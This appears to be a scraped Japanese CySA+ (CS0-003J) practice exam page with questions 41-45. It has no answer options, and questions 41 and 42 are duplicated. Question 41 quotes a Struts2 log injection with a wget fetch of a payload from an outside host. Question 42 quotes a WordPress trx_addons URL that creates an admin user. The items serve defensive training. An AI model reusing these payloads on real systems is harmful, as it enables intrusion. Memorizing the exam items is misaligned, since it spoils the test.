CS0-003J 試験問題 41
インシデント対応チームのメンバーが Linux サーバーをトリアージしています。出力は以下のとおりです。
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN
[struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget
http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) 攻撃者が実行しようとしている可能性が高いのは次のうちどれですか?
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
http:x:33:33::/srv/http:/bin/bash
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN
[struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget
http://grohl.ve.da/tmp/brkgtr.zip;#whoami)
at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.<init> (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator (FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.
java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest (JakartaMultipartRequest.java:423) 攻撃者が実行しようとしている可能性が高いのは次のうちどれですか?
CS0-003J 試験問題 42
アナリストは、悪意があることが知られている IP アドレスが複数の Web サーバーのゼロデイ脆弱性を悪用しようとしたことを示す IPS イベント通知を SIEM から受け取りました。エクスプロイトには次のスニペットが含まれていました。
/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator このスニペットで表される攻撃を軽減するために最も効果的なコントロールは次のうちどれですか?
/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator このスニペットで表される攻撃を軽減するために最も効果的なコントロールは次のうちどれですか?
CS0-003J 試験問題 43
セキュリティ アナリストは、セキュリティ スキャン中に、重要なアプリケーションで同じ脆弱性を定期的に発見します。SDLC フェーズに沿って適用した場合、この問題を最も軽減する推奨事項は次のうちどれですか?
CS0-003J 試験問題 44
複数の SaaS アプリケーションのクラウド移行に着手する際、組織のシステム管理者はクラウドベースの資産への ID およびアクセス管理に苦労しました。次のどのサービス モデルを使用すれば、このプロジェクトの複雑さが軽減されるでしょうか。
CS0-003J 試験問題 45
アナリストがインターネットを使用してシステムの問題を調査した後、サーバー プール内の仮想 Web サーバーがマルウェアに感染しました。サーバーが再構築され、サーバー プールに戻された後、ユーザーから Web サイトに問題があることが報告され、サイトが信頼できないことが示されました。サーバーの問題の原因として最も可能性が高いのは次のうちどれですか。